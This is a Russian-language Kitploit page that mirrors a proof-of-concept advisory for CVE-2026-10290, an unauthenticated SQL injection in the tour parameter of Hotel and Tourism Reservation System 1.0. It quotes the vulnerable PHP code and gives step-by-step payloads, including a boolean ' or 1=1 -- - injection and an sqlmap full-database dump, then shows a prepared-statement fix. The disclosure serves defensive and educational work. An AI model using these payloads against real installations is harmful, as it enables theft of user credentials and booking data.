Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-10290-SQLI — Доказательство концепции неаутентифицированной SQL-инъекции в Hotel and Tourism Reservation System 1.0, демонстрирующее извлечение базы данных через параметр tour. | Kitploit
Инструменты/GitHubGitHub/xmyronn/cve-2026-10290-sqli
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеБезопасность Баз Данных
GitHubxmyronn/cve-2026-10290-sqli

CVE-2026-10290-SQLI

Доказательство концепции неаутентифицированной SQL-инъекции в Hotel and Tourism Reservation System 1.0, демонстрирующее извлечение базы данных через параметр tour.

Репозиторий
23 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Система бронирования отелей и туров – Неаутентифицированная SQL-инъекция в tour.php

Детали уязвимости

ПолеДетали
НазваниеСистема бронирования отелей и туров – SQL-инъекция через GET-параметр tour
Поставщикcode-projects.org
URL поставщикаhttps://code-projects.org/hotel-and-tourism-reservation-in-php-with-source-code/
ПродуктСистема бронирования отелей и туров
Версия1.0
Тип уязвимостиSQL-инъекция
CWECWE-89
Балл CVSS9.8 (Критический)
Вектор CVSSCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Затронутый файл/ht/tour.php
Затронутый параметрtour (GET)
Требуется аутентификацияНет
Удаленная эксплуатацияДа
ИсследовательSyed Imad Uddin Alvi

Описание

Критическая уязвимость SQL-инъекции существует в GET-параметре tour файла tour.php в Системе бронирования отелей и туров 1.0. Параметр передаётся напрямую в необработанный SQL-запрос без какой-либо санитизации, подготовленных выражений или проверки ввода. Неаутентифицированный удалённый злоумышленник может манипулировать запросом для извлечения, изменения или удаления любых данных в базе. Уязвимость подтверждена полным дампом базы данных с помощью sqlmap.

Уязвимый код в tour.php:

root@kitploit:~
if(isset($_GET['tour'])) {
    $tourID = $_GET['tour'];
    $select = $db->query("SELECT * FROM tourism WHERE id = '{$tourID}' ");
    $s = $db->query("SELECT * FROM tourism WHERE id = '{$tourID}' ");
    $data = mysqli_fetch_assoc($s);

$tourID берётся напрямую из $_GET['tour'] и интерполируется в SQL-запрос без какой-либо санитизации.


Шаги по воспроизведению

Установка: Установите Систему бронирования отелей и туров 1.0 на XAMPP и получите доступ по адресу http://<target>/ht/

Шаг 1 — Посетите любую страницу тура как неаутентифицированный пользователь:

root@kitploit:~
http://<target>/ht/tour.php?tour=4
Screenshot 2026-05-12 001635

Шаг 2 — Вставьте одинарную кавычку, чтобы сломать SQL-запрос и подтвердить уязвимость:

root@kitploit:~
http://<target>/ht/tour.php?tour='

Результат: Выбрасывается фатальная ошибка MySQL — подтверждение того, что несанитизированный ввод достигает SQL-запроса.

Screenshot 2026-05-12 001643

Шаг 3 — Подтвердите SQLi с помощью булевой нагрузки:

root@kitploit:~
http://<target>/ht/tour.php?tour=' or 1=1 -- -

Результат: Страница загружается нормально с данными тура — булева инъекция успешна.

Screenshot 2026-05-12 001654

Шаг 4 — Сделайте дамп всей базы данных с помощью sqlmap:

root@kitploit:~
sqlmap -r sqli.txt --dump --batch

Результат: sqlmap успешно сбрасывает все таблицы в hotel_db, включая users, rooms, tour_reserves, gallery — подтверждена полная компрометация базы данных.

Screenshot 2026-05-12 001722

Воздействие

Неаутентифицированный удалённый злоумышленник может:

  • Извлечение всех данных из базы данных, включая учётные данные пользователей, email, номера телефонов и детали бронирования
  • Обход аутентификации путём извлечения учётных данных администратора
  • Изменение или удаление любых записей в базе данных
  • Потенциально получить удалённое выполнение кода через INTO OUTFILE, если предоставлены файловые привилегии

Первопричина

GET-параметр tour интерполируется напрямую в необработанный SQL-запрос без использования подготовленных выражений, параметризованных запросов или санитизации ввода:

root@kitploit:~
// УЯЗВИМО
$tourID = $_GET['tour'];
$select = $db->query("SELECT * FROM tourism WHERE id = '{$tourID}' ");

// ИСПРАВЛЕНО — используйте подготовленные выражения
$stmt = $db->prepare("SELECT * FROM tourism WHERE id = ?");
$stmt->bind_param("i", $_GET['tour']);
$stmt->execute();

Ссылки

  • CWE-89: Некорректная нейтрализация специальных элементов, используемых в SQL-команде
  • OWASP: SQL-инъекция
  • Система бронирования отелей и туров — code-projects.org

Обнаружил

Syed Imad Uddin Alvi — независимый исследователь безопасности

Скачать инструмент